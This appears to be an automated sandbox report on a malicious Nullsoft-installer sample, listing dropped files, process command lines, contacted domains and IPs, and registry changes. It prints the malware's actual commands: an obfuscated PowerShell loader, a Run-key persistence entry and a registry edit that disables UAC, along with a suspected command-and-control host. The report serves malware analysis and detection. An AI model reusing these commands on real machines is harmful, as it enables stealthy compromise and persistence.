Files

File Path | Type | Category | Malicious
---|---|---|---
`8BoeFOfNMo.exe` | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | initial sample |
`C:\Users\user\AppData\Local\Temp\Chalcomenite.exe` | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | dropped |
`C:\Users\user\AppData\Local\Temp\Chalcomenite.exe:Zone.Identifier` | ASCII text, with CRLF line terminators | dropped |
`C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\BgImage.dll` | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
`C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\UserInfo.dll` | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
`C:\Users\user\AppData\Local\Temp\nsv8C98.tmp\nsExec.dll` | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
`C:\ProgramData\Microsoft\Network\Downloader\edb.log` | data | dropped |
`C:\ProgramData\Microsoft\Network\Downloader\qmgr.db` | Extensible storage user DataBase, version 0x620, checksum 0x9b02f762, page size 16384, DirtyShutdown, Windows version 10.0 | dropped |
`C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm` | data | dropped |
`C:\ProgramData\ios\logs.dat` | data | dropped |
`C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache` | data | modified |
`C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5hglr25s.zhl.psm1` | ASCII text, with no line terminators | dropped |
`C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwplqiwm.22q.ps1` | ASCII text, with no line terminators | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\gldssaneringssagen.ind` | data | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\mellemhandlen.lov` | data | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\nonconcentric.cit` | OpenPGP Public Key | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\penalisables.txt` | ASCII text, with CRLF line terminators | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Gtede\holger\procenttals.min` | data | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv` | ASCII text, with very long lines (53804), with no line terminators | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Roth.Fri` | data | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\epistropheus.has` | data | dropped |
`C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\feriegodtgrelsen.che` | data | dropped |
`C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp` | JSON data | dropped |

Processes

Path | Cmdline | Malicious
---|---|---
`C:\Users\user\Desktop\8BoeFOfNMo.exe` | `"C:\Users\user\Desktop\8BoeFOfNMo.exe"` |
`C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` | `"powershell.exe" -windowstyle minimized "$Hovedgrdes=Get-Content 'C:\Users\user\AppData\Local\dyremedicin\Fejlstrmmen\Hairbrained.Adv';$Nrlst=$Hovedgrdes.SubString(3639,3);.$Nrlst($Hovedgrdes)"` |
`C:\Users\user\AppData\Local\Temp\Chalcomenite.exe` | `"C:\Users\user\AppData\Local\Temp\Chalcomenite.exe"` |
`C:\Windows\SysWOW64\cmd.exe` | `"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Polychotomy% -windowstyle minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy% ($Preexposure)"` |
`C:\Windows\SysWOW64\reg.exe` | `REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Polychotomy% -windowstyle minimized $Preexposure=(Get-ItemProperty -Path 'HKCU:\Exundance\').Veterinren;%Polychotomy% ($Preexposure)"` |
`C:\Windows\SysWOW64\cmd.exe` | `/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f` |
`C:\Windows\SysWOW64\reg.exe` | `C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f` |
`C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` |
`C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` |
`C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` |
`C:\Windows\System32\svchost.exe` | `C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS` |

URLs

Name | IP | Malicious
---|---|---
Zjjnrg.line.pm | |
https://www.google.com | unknown |
http://nuget.org/NuGet.exe | unknown |
http://nsis.sf.net/NSIS_Error | unknown |
http://pesterbdd.com/images/Pester.png | unknown |
https://aka.ms/pscore6lB | unknown |
http://www.apache.org/licenses/LICENSE-2.0.html | unknown |
https://drive.google.com/ | unknown |
https://contoso.com/ | unknown |
https://nuget.org/nuget.exe | unknown |
https://contoso.com/License | unknown |
https://contoso.com/Icon | unknown |
https://drive.usercontent.google.com/ | unknown |
https://apis.google.com | unknown |
http://nsis.sf.net/NSIS_ErrorError | unknown |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
https://drive.google.com/d | unknown |
https://github.com/Pester/Pester | unknown |

Domains

Name | IP | Malicious
---|---|---
jnrg.line.pm | 194.59.30.244 |
drive.google.com | 142.250.185.238 |
drive.usercontent.google.com | 216.58.206.33 |

IPs

IP | Domain | Country | Malicious
---|---|---|---
194.59.30.244 | jnrg.line.pm | Germany |
216.58.206.33 | drive.usercontent.google.com | United States |
142.250.185.238 | drive.google.com | United States |
127.0.0.1 | unknown | unknown |

Registry

Path | Value | Malicious
---|---|---
`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` | EnableLUA |
`HKEY_CURRENT_USER\Exundance` | Veterinren |
`HKEY_CURRENT_USER\Environment` | Polychotomy |
`HKEY_CURRENT_USER\SOFTWARE\-4JAT38` | exepath |
`HKEY_CURRENT_USER\SOFTWARE\-4JAT38` | licence |
`HKEY_CURRENT_USER\SOFTWARE\-4JAT38` | time |
`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` | Startup key |
`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS` | PerfMMFileName |
